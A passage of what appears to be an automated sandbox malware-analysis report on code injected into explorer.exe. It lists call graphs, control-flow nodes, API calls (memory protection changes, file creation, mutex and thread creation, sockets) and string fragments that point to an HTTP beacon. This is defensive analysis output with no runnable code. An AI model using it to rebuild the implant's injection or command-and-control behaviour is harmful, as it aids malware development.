e747ce2 13846 e747dd9 13844->13846 13845 e748022 13846->13845 13850 e747352 13846->13850 13848 e747f0d 13848->13845 13859 e747792 13848->13859 13851 e74739e 13850->13851 13852 e74758e 13851->13852 13853 e7474ec 13851->13853 13855 e747595 13851->13855 13852->13848 13854 e74d232 NtCreateFile 13853->13854 13857 e7474ff 13854->13857 13855->13852 13856 e74d232 NtCreateFile 13855->13856 13856->13852 13857->13852 13858 e74d232 NtCreateFile 13857->13858 13858->13852 13860 e7477e0 13859->13860 13861 e74d232 NtCreateFile 13860->13861 13863 e74790c 13861->13863 13862 e747af3 13862->13848 13863->13862 13864 e747352 NtCreateFile 13863->13864 13865 e747602 NtCreateFile 13863->13865 13864->13863 13865->13863 13519 e74ebac 13520 e74ebb1 13519->13520 13553 e74ebb6 13520->13553 13554 e744b72 13520->13554 13522 e74ec2c 13523 e74ec85 13522->13523 13525 e74ec54 13522->13525 13526 e74ec69 13522->13526 13522->13553 13524 e74cab2 NtProtectVirtualMemory 13523->13524 13530 e74ec8d 13524->13530 13527 e74cab2 NtProtectVirtualMemory 13525->13527 13528 e74ec80 13526->13528 13529 e74ec6e 13526->13529 13531 e74ec5c 13527->13531 13528->13523 13533 e74ec97 13528->13533 13532 e74cab2 NtProtectVirtualMemory 13529->13532 13590 e746102 13530->13590 13576 e745ee2 13531->13576 13538 e74ec76 13532->13538 13535 e74ec9c 13533->13535 13536 e74ecbe 13533->13536 13558 e74cab2 13535->13558 13540 e74ecc7 13536->13540 13541 e74ecd9 13536->13541 13536->13553 13582 e745fc2 13538->13582 13543 e74cab2 NtProtectVirtualMemory 13540->13543 13544 e74cab2 NtProtectVirtualMemory 13541->13544 13541->13553 13546 e74eccf 13543->13546 13547 e74ece5 13544->13547 13600 e7462f2 13546->13600 13618 e746712 13547->13618 13556 e744b93 13554->13556 13555 e744cce 13555->13522 13556->13555 13557 e744cb5 CreateMutexW 13556->13557 13557->13555 13560 e74cadf 13558->13560 13559 e74cebc 13568 e745de2 13559->13568 13560->13559 13630 e7428f2 13560->13630 13562 e74ce5c 13563 e7428f2 NtProtectVirtualMemory 13562->13563 13564 e74ce7c 13563->13564 13565 e7428f2 NtProtectVirtualMemory 13564->13565 13566 e74ce9c 13565->13566 13567 e7428f2 NtProtectVirtualMemory 13566->13567 13567->13559 13569 e745df0 13568->13569 13571 e745ecd 13569->13571 13653 e749382 13569->13653 13572 e742412 13571->13572 13574 e742440 13572->13574 13573 e742473 13573->13553 13574->13573 13575 e74244d CreateThread 13574->13575 13575->13553 13578 e745f06 13576->13578 13577 e745fa4 13577->13553 13578->13577 13579 e7428f2 NtProtectVirtualMemory 13578->13579 13580 e745f9c 13579->13580 13581 e749382 ObtainUserAgentString 13580->13581 13581->13577 13583 e746016 13582->13583 13585 e7460bb 13583->13585 13587 e7428f2 NtProtectVirtualMemory 13583->13587 13588 e7460f0 13583->13588 13584 e7460e8 13586 e749382 ObtainUserAgentString 13584->13586 13585->13584 13589 e7428f2 NtProtectVirtualMemory 13585->13589 13586->13588 13587->13585 13588->13553 13589->13584 13592 e746137 13590->13592 13591 e7462d5 13591->13553 13592->13591 13593 e7428f2 NtProtectVirtualMemory 13592->13593 13594 e74628a 13593->13594 13595 e7428f2 NtProtectVirtualMemory 13594->13595 13598 e7462a9 13595->13598 13596 e7462cd 13597 e749382 ObtainUserAgentString 13596->13597 13597->13591 13598->13596 13599 e7428f2 NtProtectVirtualMemory 13598->13599 13599->13596 13601 e746349 13600->13601 13602 e74649f 13601->13602 13604 e7428f2 NtProtectVirtualMemory 13601->13604 13603 e7428f2 NtProtectVirtualMemory 13602->13603 13607 e7464c3 13602->13607 13603->13607 13605 e746480 13604->13605 13606 e7428f2 NtProtectVirtualMemory 13605->13606 13606->13602 13608 e7428f2 NtProtectVirtualMemory 13607->13608 13609 e746597 13607->13609 13608->13609 13610 e7428f2 NtProtectVirtualMemory 13609->13610 13611 e7465bf 13609->13611 13610->13611 13614 e7428f2 NtProtectVirtualMemory 13611->13614 13615 e7466b9 13611->13615 13612 e7466e1 13613 e749382 ObtainUserAgentString 13612->13613 13616 e7466e9 13613->13616 13614->13615 13615->13612 13617 e7428f2 NtProtectVirtualMemory 13615->13617 13616->13553 13617->13612 13619 e746767 13618->13619 13620 e7428f2 NtProtectVirtualMemory 13619->13620 13624 e746903 13619->13624 13621 e7468e3 13620->13621 13622 e7428f2 NtProtectVirtualMemory 13621->13622 13622->13624 13623 e7469b7 13625 e749382 ObtainUserAgentString 13623->13625 13626 e746992 13624->13626 13628 e7428f2 NtProtectVirtualMemory 13624->13628 13627 e7469bf 13625->13627 13626->13623 13629 e7428f2 NtProtectVirtualMemory 13626->13629 13627->13553 13628->13626 13629->13623 13631 e742987 13630->13631 13634 e7429b2 13631->13634 13645 e743622 13631->13645 13633 e742c0c 13633->13562 13634->13633 13635 e742ba2 13634->13635 13637 e742ac5 13634->13637 13636 e74ee12 NtProtectVirtualMemory 13635->13636 13644 e742b5b 13636->13644 13649 e74ee12 13637->13649 13639 e74ee12 NtProtectVirtualMemory 13639->13633 13640 e742ae3 13640->13633 13641 e742b3d 13640->13641 13643 e74ee12 NtProtectVirtualMemory 13640->13643 13642 e74ee12 NtProtectVirtualMemory 13641->13642 13642->13644 13643->13641 13644->13633 13644->13639 13647 e74367a 13645->13647 13646 e74367e 13646->13634 13647->13646 13648 e74ee12 NtProtectVirtualMemory 13647->13648 13648->13647 13650 e74d942 13649->13650 13651 e74ee45 NtProtectVirtualMemory 13650->13651 13652 e74ee70 13651->13652 13652->13640 13654 e7493c7 13653->13654 13657 e749232 13654->13657 13656 e749438 13656->13571 13658 e74925e 13657->13658 13661 e7488c2 13658->13661 13660 e74926b 13660->13656 13662 e748934 13661->13662 13663 e7489a6 13662->13663 13664 e748995 ObtainUserAgentString 13662->13664 13663->13660 13664->13663 13772 e74342e 13773 e74345b 13772->13773 13781 e7434c9 13772->13781 13774 e74d232 NtCreateFile 13773->13774 13773->13781 13775 e743496 13774->13775 13776 e7434c5 13775->13776 13777 e743082 NtCreateFile 13775->13777 13778 e74d232 NtCreateFile 13776->13778 13776->13781 13779 e7434b6 13777->13779 13778->13781 13779->13776 13780 e742f52 NtCreateFile 13779->13780 13780->13776 13930 e74a72e 13931 e74a788 connect 13930->13931 13932 e74a76a 13930->13932 13932->13931 13886 e74faa9 13887 e74faaf 13886->13887 13890 e74a212 13887->13890 13889 e74fac7 13891 e74a237 13890->13891 13892 e74a21b 13890->13892 13891->13889 13892->13891 13893 e74a0c2 6 API calls 13892->13893 13893->13891 13782 e74922a 13783 e74925e 13782->13783 13784 e7488c2 ObtainUserAgentString 13783->13784 13785 e74926b 13784->13785 13866 e747cd4 13867 e747cd8 13866->13867 13868 e748022 13867->13868 13869 e747352 NtCreateFile 13867->13869 13870 e747f0d 13869->13870 13870->13868 13871 e747792 NtCreateFile 13870->13871 13871->13870 13488 e74ee12 13492 e74d942 13488->13492 13490 e74ee45 NtProtectVirtualMemory 13491 e74ee70 13490->13491 13493 e74d967 13492->13493 13493->13490 13786 e743613 13788 e743620 13786->13788 13787 e74367e 13788->13787 13789 e74ee12 NtProtectVirtualMemory 13788->13789 13789->13788 13665 e7422dd 13668 e74231a 13665->13668 13666 e7423fa 13667 e742328 SleepEx 13667->13667 13667->13668 13668->13666 13668->13667 13672 e74cf12 13668->13672 13681 e743432 13668->13681 13691 e7420f2 13668->13691 13677 e74cf48 13672->13677 13673 e74d134 13673->13668 13674 e74d0e9 13676 e74d125 13674->13676 13709 e74c842 13674->13709 13717 e74c922 13676->13717 13677->13673 13677->13674 13679 e74d232 NtCreateFile 13677->13679 13697 e74df82 13677->13697 13679->13677 13682 e74345b 13681->13682 13690 e7434c9 13681->13690 13683 e74d232 NtCreateFile 13682->13683 13682->13690 13684 e743496 13683->13684 13689 e7434c5 13684->13689 13729 e743082 13684->13729 13686 e74d232 NtCreateFile 13686->13690 13687 e7434b6 13687->13689 13738 e742f52 13687->13738 13689->13686 13689->13690 13690->13668 13692 e742109 13691->13692 13696 e7421d3 13691->13696 13743 e742012 13692->13743 13694 e742113 13695 e74df82 6 API calls 13694->13695 13694->13696 13695->13696 13696->13668 13698 e74dfb8 13697->13698 13699 e74a5b2 socket 13698->13699 13700 e74e081 13698->13700 13708 e74e022 13698->13708 13699->13700 13701 e74e134 13700->13701 13703 e74e117 getaddrinfo 13700->13703 13700->13708 13702 e74a732 connect 13701->13702 13707 e74e1b2 13701->13707 13701->13708 13702->13707 13703->13701 13704 e74a6b2 send 13706 e74e729 13704->13706 13705 e74e7f4 setsockopt recv 13705->13708 13706->13705 13706->13708 13707->13704 13707->13708 13708->13677 13710 e74c86d 13709->13710 13725 e74d232 13710->13725 13712 e74c906 13712->13674 13713 e74c888 13713->13712 13714 e74df82 6 API calls 13713->13714 13715 e74c8c5 13713->13715 13714->13715 13715->13712 13716 e74d232 NtCreateFile 13715->13716 13716->13712 13718 e74c9c2 13717->13718 13719 e74d232 NtCreateFile 13718->13719 13720 e74c9d6 13719->13720 13721 e74ca9f 13720->13721 13722 e74ca5d 13720->13722 13724 e74df82 6 API calls 13720->13724 13721->13673 13722->13721 13723 e74d232 NtCreateFile 13722->13723 13723->13721 13724->13722 13726 e74d25c 13725->13726 13728 e74d334 13725->13728 13727 e74d410 NtCreateFile 13726->13727 13726->13728 13727->13728 13728->13713 13730 e743420 13729->13730 13731 e7430aa 13729->13731 13730->13687 13731->13730 13732 e74d232 NtCreateFile 13731->13732 13734 e7431f9 13732->13734 13733 e7433df 13733->13687 13734->13733 13735 e74d232 NtCreateFile 13734->13735 13736 e7433c9 13735->13736 13737 e74d232 NtCreateFile 13736->13737 13737->13733 13739 e742f70 13738->13739 13740 e742f84 13738->13740 13739->13689 13741 e74d232 NtCreateFile 13740->13741 13742 e743046 13741->13742 13742->13689 13744 e742031 13743->13744 13745 e7420cd 13744->13745 13746 e74df82 6 API calls 13744->13746 13745->13694 13746->13745 13872 e745edd 13874 e745f06 13872->13874 13873 e745fa4 13874->13873 13875 e7428f2 NtProtectVirtualMemory 13874->13875 13876 e745f9c 13875->13876 13877 e749382 ObtainUserAgentString 13876->13877 13877->13873 13790 e74fa1f 13791 e74fa25 13790->13791 13794 e7435f2 13791->13794 13793 e74fa3d 13795 e74360e 13794->13795 13796 e7435fb 13794->13796 13795->13793 13796->13795 13797 e748662 6 API calls 13796->13797 13797->13795 13949 e745dd9 13950 e745df0 13949->13950 13951 e749382 ObtainUserAgentString 13950->13951 13952 e745ecd 13950->13952 13951->13952 13498 e74df82 13499 e74dfb8 13498->13499 13501 e74e081 13499->13501 13509 e74e022 13499->13509 13510 e74a5b2 13499->13510 13502 e74e134 13501->13502 13504 e74e117 getaddrinfo 13501->13504 13501->13509 13508 e74e1b2 13502->13508 13502->13509 13513 e74a732 13502->13513 13504->13502 13506 e74e7f4 setsockopt recv 13506->13509 13507 e74e729 13507->13506 13507->13509 13508->13509 13516 e74a6b2 13508->13516 13511 e74a5ec 13510->13511 13512 e74a60a socket 13510->13512 13511->13512 13512->13501 13514 e74a788 connect 13513->13514 13515 e74a76a 13513->13515 13514->13508 13515->13514 13517 e74a705 send 13516->13517 13518 e74a6e7 13516->13518 13517->13507 13518->13517 13747 e74fa4d 13748 e74fa53 13747->13748 13751 e743782 13748->13751 13750 e74fa6b 13753 e74378f 13751->13753 13752 e7437ad 13752->13750 13753->13752 13755 e748662 13753->13755 13756 e74866b 13755->13756 13764 e7487ba 13755->13764 13757 e7420f2 6 API calls 13756->13757 13756->13764 13759 e7486ee 13757->13759 13758 e748750 13761 e74883f 13758->13761 13762 e748791 13758->13762 13758->13764 13759->13758 13760 e74df82 6 API calls 13759->13760 13760->13758 13763 e74df82 6 API calls 13761->13763 13761->13764 13762->13764 13765 e74df82 6 API calls 13762->13765 13763->13764 13764->13752 13765->13764 13798 e74ee0a 13799 e74ee45 NtProtectVirtualMemory 13798->13799 13800 e74d942 13798->13800 13801 e74ee70 13799->13801 13800->13799 13914 e74714a 13915 e747153 13914->13915 13920 e747174 13914->13920 13917 e749382 ObtainUserAgentString 13915->13917 13916 e7471e7 13918 e74716c 13917->13918 13919 e7420f2 6 API calls 13918->13919 13919->13920 13920->13916 13922 e7421f2 13920->13922 13923 e74220f 13922->13923 13926 e7422c9 13922->13926 13924 e74cf12 7 API calls 13923->13924 13925 e742242 13923->13925 13924->13925 13928 e743432 NtCreateFile 13925->13928 13929 e742289 13925->13929 13926->13920 13927 e7420f2 6 API calls 13927->13926 13928->13929 13929->13926 13929->13927

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 0 e74df82-e74dfb6 1 e74dfd6-e74dfd9 0->1 2 e74dfb8-e74dfbc 0->2 3 e74e8fe-e74e90c 1->3 4 e74dfdf-e74dfed 1->4 2->1 5 e74dfbe-e74dfc2 2->5 6 e74e8f6-e74e8f7 4->6 7 e74dff3-e74dff7 4->7 5->1 8 e74dfc4-e74dfc8 5->8 6->3 9 e74dfff-e74e000 7->9 10 e74dff9-e74dffd 7->10 8->1 11 e74dfca-e74dfce 8->11 12 e74e00a-e74e010 9->12 10->9 10->12 11->1 13 e74dfd0-e74dfd4 11->13 14 e74e012-e74e020 12->14 15 e74e03a-e74e060 12->15 13->1 13->4 14->15 18 e74e022-e74e026 14->18 16 e74e062-e74e066 15->16 17 e74e068-e74e07c call e74a5b2 15->17 16->17 19 e74e0a8-e74e0ab 16->19 22 e74e081-e74e0a2 17->22 18->6 21 e74e02c-e74e035 18->21 23 e74e144-e74e150 19->23 24 e74e0b1-e74e0b8 19->24 21->6 22->19 26 e74e8ee-e74e8ef 22->26 25 e74e156-e74e165 23->25 23->26 27 e74e0e2-e74e0f5 24->27 28 e74e0ba-e74e0dc call e74d942 24->28 29 e74e167-e74e178 call e74a552 25->29 30 e74e17f-e74e18f 25->30 26->6 27->26 32 e74e0fb-e74e101 27->32 28->27 29->30 35 e74e1e5-e74e21b 30->35 36 e74e191-e74e1ad call e74a732 30->36 32->26 33 e74e107-e74e109 32->33 33->26 38 e74e10f-e74e111 33->38 41 e74e22d-e74e231 35->41 42 e74e21d-e74e22b 35->42 47 e74e1b2-e74e1da 36->47 38->26 46 e74e117-e74e132 getaddrinfo 38->46 44 e74e247-e74e24b 41->44 45 e74e233-e74e245 41->45 43 e74e27f-e74e280 42->43 51 e74e283-e74e2e0 call e74ed62 call e74b482 call e74ae72 call e74f002 43->51 48 e74e261-e74e265 44->48 49 e74e24d-e74e25f 44->49 45->43 46->23 50 e74e134-e74e13c 46->50 47->35 52 e74e1dc-e74e1e1 47->52 53 e74e267-e74e26b 48->53 54 e74e26d-e74e279 48->54 49->43 50->23 63 e74e2f4-e74e354 call e74ed92 51->63 64 e74e2e2-e74e2e6 51->64 52->35 53->51 53->54 54->43 69 e74e48c-e74e4b8 call e74ed62 call e74f262 63->69 70 e74e35a-e74e396 call e74ed62 call e74f262 call e74f002 63->70 64->63 65 e74e2e8-e74e2ef call e74b042 64->65 65->63 79 e74e4d9-e74e590 call e74f262 * 3 call e74f002 * 2 call e74b482 69->79 80 e74e4ba-e74e4d5 69->80 85 e74e398-e74e3b7 call e74f262 call e74f002 70->85 86 e74e3bb-e74e3e9 call e74f262 * 2 70->86 107 e74e595-e74e5b9 call e74f262 79->107 80->79 85->86 101 e74e415-e74e41d 86->101 102 e74e3eb-e74e410 call e74f002 call e74f262 86->102 105 e74e442-e74e448 101->105 106 e74e41f-e74e425 101->106 102->101 105->107 108 e74e44e-e74e456 105->108 111 e74e467-e74e487 call e74f262 106->111 112 e74e427-e74e43d 106->112 121 e74e5d1-e74e6ad call e74f262 * 7 call e74f002 call e74ed62 call e74f002 call e74ae72 call e74b042 107->121 122 e74e5bb-e74e5cc call e74f262 call e74f002 107->122 108->107 113 e74e45c-e74e45d 108->113 111->107 112->107 113->111 132 e74e6af-e74e6b3 121->132 122->132 135 e74e6b5-e74e6fa call e74a382 call e74a7b2 132->135 136 e74e6ff-e74e72d call e74a6b2 132->136 152 e74e8e6-e74e8e7 135->152 144 e74e75d-e74e761 136->144 145 e74e72f-e74e735 136->145 149 e74e767-e74e76b 144->149 150 e74e90d-e74e913 144->150 145->144 148 e74e737-e74e74c 145->148 148->144 153 e74e74e-e74e754 148->153 156 e74e771-e74e773 149->156 157 e74e8aa-e74e8df call e74a7b2 149->157 154 e74e779-e74e784 150->154 155 e74e919-e74e920 150->155 152->26 153->144 160 e74e756 153->160 161 e74e786-e74e793 154->161 162 e74e795-e74e796 154->162 155->161 156->154 156->157 157->152 160->144 161->162 164 e74e79c-e74e7a0 161->164 162->164 167 e74e7b1-e74e7b2 164->167 168 e74e7a2-e74e7af 164->168 170 e74e7b8-e74e7c4 167->170 168->167 168->170 173 e74e7f4-e74e861 setsockopt recv 170->173 174 e74e7c6-e74e7ef call e74ed92 call e74ed62 170->174 177 e74e8a3-e74e8a4 173->177 178 e74e863 173->178 174->173 177->157 178->177 181 e74e865-e74e86a 178->181 181->177 184 e74e86c-e74e872 181->184 184->177 186 e74e874-e74e8a1 184->186 186->177 186->178
                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.4547308540.000000000E6B0000.00000040.80000000.00040000.00000000.sdmp, Offset: 0E6B0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_e6b0000_explorer.jbxd
                                          Similarity
                                          • API ID: getaddrinforecvsetsockopt
                                          • String ID: Co$&br=$&sql$&un=$: cl$GET $dat=$nnec$ose$tion
                                          • API String ID: 1564272048-1117930895
                                          • Opcode ID: 5de8858bceb6b52e8c11e308410fa1d1098ae4878da76a5e8b5a3db0c78a0a43
                                          • Instruction ID: 47124c07fb39ae0bca409dc8aafad658339579587a9052d9082cdecd53f3961f
                                          • Opcode Fuzzy Hash: 5de8858bceb6b52e8c11e308410fa1d1098ae4878da76a5e8b5a3db0c78a0a43
                                          • Instruction Fuzzy Hash: 0F529370614A088FDB29EF68D4987E9B7E1FB54310F50492ED4AFCB166EF30A945CB41
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 299 e74d232-e74d256 300 e74d25c-e74d260 299->300 301 e74d8bd-e74d8cd 299->301 300->301 302 e74d266-e74d2a0 300->302 303 e74d2a2-e74d2a6 302->303 304 e74d2bf 302->304 303->304 305 e74d2a8-e74d2ac 303->305 306 e74d2c6 304->306 307 e74d2b4-e74d2b8 305->307 308 e74d2ae-e74d2b2 305->308 309 e74d2cb-e74d2cf 306->309 307->309 310 e74d2ba-e74d2bd 307->310 308->306 311 e74d2d1-e74d2f7 call e74d942 309->311 312 e74d2f9-e74d30b 309->312 310->309 311->312 316 e74d378 311->316 312->316 317 e74d30d-e74d332 312->317 320 e74d37a-e74d3a0 316->320 318 e74d334-e74d33b 317->318 319 e74d3a1-e74d3a8 317->319 321 e74d366-e74d370 318->321 322 e74d33d-e74d360 call e74d942 318->322 323 e74d3d5-e74d3dc 319->323 324 e74d3aa-e74d3d3 call e74d942 319->324 321->316 328 e74d372-e74d373 321->328 322->321 325 e74d410-e74d458 NtCreateFile call e74d172 323->325 326 e74d3de-e74d40a call e74d942 323->326 324->316 324->323 335 e74d45d-e74d45f 325->335 326->316 326->325 328->316 335->316 336 e74d465-e74d46d 335->336 336->316 337 e74d473-e74d476 336->337 338 e74d486-e74d48d 337->338 339 e74d478-e74d481 337->339 340 e74d4c2-e74d4ec 338->340 341 e74d48f-e74d4b8 call e74d942 338->341 339->320 347 e74d4f2-e74d4f5 340->347 348 e74d8ae-e74d8b8 340->348 341->316 346 e74d4be-e74d4bf 341->346 346->340 349 e74d604-e74d611 347->349 350 e74d4fb-e74d4fe 347->350 348->316 349->320 351 e74d500-e74d507 350->351 352 e74d55e-e74d561 350->352 355 e74d538-e74d559 351->355 356 e74d509-e74d532 call e74d942 351->356 357 e74d616-e74d619 352->357 358 e74d567-e74d572 352->358 362 e74d5e9-e74d5fa 355->362 356->316 356->355 360 e74d61f-e74d626 357->360 361 e74d6b8-e74d6bb 357->361 363 e74d574-e74d59d call e74d942 358->363 364 e74d5a3-e74d5a6 358->364 369 e74d657-e74d66b call e74ee92 360->369 370 e74d628-e74d651 call e74d942 360->370 366 e74d6bd-e74d6c4 361->366 367 e74d739-e74d73c 361->367 362->349 363->316 363->364 364->316 365 e74d5ac-e74d5b6 364->365 365->316 373 e74d5bc-e74d5e6 365->373 374 e74d6f5-e74d734 366->374 375 e74d6c6-e74d6ef call e74d942 366->375 377 e74d7c4-e74d7c7 367->377 378 e74d742-e74d749 367->378 369->316 387 e74d671-e74d6b3 369->387 370->316 370->369 373->362 397 e74d894-e74d8a9 374->397 375->348 375->374 377->316 383 e74d7cd-e74d7d4 377->383 380 e74d77a-e74d7bf 378->380 381 e74d74b-e74d774 call e74d942 378->381 380->397 381->348 381->380 388 e74d7d6-e74d7f6 call e74d942 383->388 389 e74d7fc-e74d803 383->389 387->320 388->389 395 e74d805-e74d825 call e74d942 389->395 396 e74d82b-e74d835 389->396 395->396 396->348 398 e74d837-e74d83e 396->398 397->320 398->348 402 e74d840-e74d886 398->402 402->397
                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.4547308540.000000000E6B0000.00000040.80000000.00040000.00000000.sdmp, Offset: 0E6B0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_e6b0000_explorer.jbxd
                                          Similarity
                                          • API ID: CreateFile
                                          • String ID: `
                                          • API String ID: 823142352-2679148245
                                          • Opcode ID: de128a41b66c8ec8222e6cdebfc92e8119e2b93de7d93fbb6a18759800a4d987
                                          • Instruction ID: b01937ea6005fa5ec67cc2ca5e0c1cc6475ab3ed2c565e625c1bca543924b0c9
                                          • Opcode Fuzzy Hash: de128a41b66c8ec8222e6cdebfc92e8119e2b93de7d93fbb6a18759800a4d987
                                          • Instruction Fuzzy Hash: 4C2232B0A18E099FCB69DF28C4996ADF7E1FB98301F40462ED59ED7260DB30D851CB81
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 443 e74ee12-e74ee6e call e74d942 NtProtectVirtualMemory 446 e74ee70-e74ee7c 443->446 447 e74ee7d-e74ee8f 443->447
                                          APIs
                                          • NtProtectVirtualMemory.NTDLL ref: 0E74EE67
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.4547308540.000000000E6B0000.00000040.80000000.00040000.00000000.sdmp, Offset: 0E6B0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_e6b0000_explorer.jbxd
                                          Similarity
                                          • API ID: MemoryProtectVirtual
                                          • String ID:
                                          • API String ID: 2706961497-0
                                          • Opcode ID: 8fde5b3aa229c20c01e10f6c0a0911328a1d50ad6ca7dd15efa95d0be41baddf
                                          • Instruction ID: e2e033de5126155b20fa29bb3def9afb25baae07cc8d538098b6782a633700d8
                                          • Opcode Fuzzy Hash: 8fde5b3aa229c20c01e10f6c0a0911328a1d50ad6ca7dd15efa95d0be41baddf
                                          • Instruction Fuzzy Hash: 77017134668B484F9B88EF6CD48522AB7E4FBDE315F000B3EE99AC7254EB74D9414742
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 448 e74ee0a-e74ee38 449 e74ee45-e74ee6e NtProtectVirtualMemory 448->449 450 e74ee40 call e74d942 448->450 451 e74ee70-e74ee7c 449->451 452 e74ee7d-e74ee8f 449->452 450->449
                                          APIs
                                          • NtProtectVirtualMemory.NTDLL ref: 0E74EE67
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.4547308540.000000000E6B0000.00000040.80000000.00040000.00000000.sdmp, Offset: 0E6B0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_e6b0000_explorer.jbxd
                                          Similarity
                                          • API ID: MemoryProtectVirtual
                                          • String ID:
                                          • API String ID: 2706961497-0
                                          • Opcode ID: d782dca5996f3574fd0c4455d89641a9bf745bba617b6185d934ac73d2235392
                                          • Instruction ID: 2138066b19d7eb57d23cf782534bb7663ba02dda567d64c8cebabfc85debc8c4
                                          • Opcode Fuzzy Hash: d782dca5996f3574fd0c4455d89641a9bf745bba617b6185d934ac73d2235392
                                          • Instruction Fuzzy Hash: 2C01A274628B884B8B48EF2C94452A6B3E5FBCE314F000B3EE9DAC3251DB21D9024782
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Control-flow Graph

                                          APIs
                                          • ObtainUserAgentString.URLMON ref: 0E7489A0
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.4547308540.000000000E6B0000.00000040.80000000.00040000.00000000.sdmp, Offset: 0E6B0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_e6b0000_explorer.jbxd
                                          Similarity
                                          • API ID: AgentObtainStringUser
                                          • String ID: User-Agent: $nt: $on.d$urlmon.dll
                                          • API String ID: 2681117516-319646191
                                          • Opcode ID: fab8d4f3d63e7cb3a61fc22749300fb1f1c56e9464b264e147718cbb7a7b3fb5
                                          • Instruction ID: 9fd33638f5230fa455aa7d8d8bb2fb67978f19c4115593f099c39a999240bbed
                                          • Opcode Fuzzy Hash: fab8d4f3d63e7cb3a61fc22749300fb1f1c56e9464b264e147718cbb7a7b3fb5
                                          • Instruction Fuzzy Hash: DC31D171614A0C8FCB05EFA8D8887EDB7E0FB98214F40062AD44ED7260DF748A45CB8A
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Control-flow Graph

                                          APIs
                                          • ObtainUserAgentString.URLMON ref: 0E7489A0
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.4547308540.000000000E6B0000.00000040.80000000.00040000.00000000.sdmp, Offset: 0E6B0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_e6b0000_explorer.jbxd
                                          Similarity
                                          • API ID: AgentObtainStringUser
                                          • String ID: User-Agent: $nt: $on.d$urlmon.dll
                                          • API String ID: 2681117516-319646191
                                          • Opcode ID: 89ed80dc1d123a3fdb33b1283e784163d7980008e053a39b7e2b7c015d122c3c
                                          • Instruction ID: 9823a9530167c6474351315ab007edc87af5e2816a3fcfc88cb18879de195e13
                                          • Opcode Fuzzy Hash: 89ed80dc1d123a3fdb33b1283e784163d7980008e053a39b7e2b7c015d122c3c
                                          • Instruction Fuzzy Hash: 6321B6B0614A4C8FCF15EFA8D8487EDBBE1FF58204F40461AE45AD7260DF748A45CB86
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 232 e744b66-e744b68 233 e744b93-e744bb8 232->233 234 e744b6a-e744b71 232->234 236 e744bbb-e744c22 call e74b612 call e74d942 * 2 233->236 234->236 237 e744b73-e744b92 234->237 244 e744cdc 236->244 245 e744c28-e744c2b 236->245 237->233 246 e744cde-e744cf6 244->246 245->244 247 e744c31-e744cd3 call e74fda4 call e74f022 call e74f3e2 call e74f022 call e74f3e2 CreateMutexW 245->247 247->244 261 e744cd5-e744cda 247->261 261->246
                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.4547308540.000000000E6B0000.00000040.80000000.00040000.00000000.sdmp, Offset: 0E6B0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_e6b0000_explorer.jbxd
                                          Similarity
                                          • API ID: CreateMutex
                                          • String ID: .dll$el32$kern
                                          • API String ID: 1964310414-1222553051
                                          • Opcode ID: 440592a6460f4a8a809c4e0f2019460d4d12f006c7151b444d4376acf3ab05fa
                                          • Instruction ID: 83dda7d353e71741d6cf734857518a36b4cd0d38c174a5f942de2d93fa4c42eb
                                          • Opcode Fuzzy Hash: 440592a6460f4a8a809c4e0f2019460d4d12f006c7151b444d4376acf3ab05fa
                                          • Instruction Fuzzy Hash: 114160B0918A088FDB54EFA8C8987AD77E0FF98300F04457AC84EDB265EF309945CB45
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Control-flow Graph

                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.4547308540.000000000E6B0000.00000040.80000000.00040000.00000000.sdmp, Offset: 0E6B0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_e6b0000_explorer.jbxd
                                          Similarity
                                          • API ID: CreateMutex
                                          • String ID: .dll$el32$kern
                                          • API String ID: 1964310414-1222553051
                                          • Opcode ID: d29081eafe973aeb990ac80f5dcafeb95ade16b14a0ff6f6c0f9231c9beedf12
                                          • Instruction ID: 8e5f93b242c717ce272b81ff13b887f88f50c0764ea7919c402da143176a14b8
                                          • Opcode Fuzzy Hash: d29081eafe973aeb990ac80f5dcafeb95ade16b14a0ff6f6c0f9231c9beedf12
                                          • Instruction Fuzzy Hash: 7A412CB0918A088FDB58EFA8C498BAD77E0FF98300F44456AC84ADB265DF309945CB85
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 289 e74a72e-e74a768 290 e74a788-e74a7ab connect 289->290 291 e74a76a-e74a782 call e74d942 289->291 291->290
                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.4547308540.000000000E6B0000.00000040.80000000.00040000.00000000.sdmp, Offset: 0E6B0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_e6b0000_explorer.jbxd
                                          Similarity
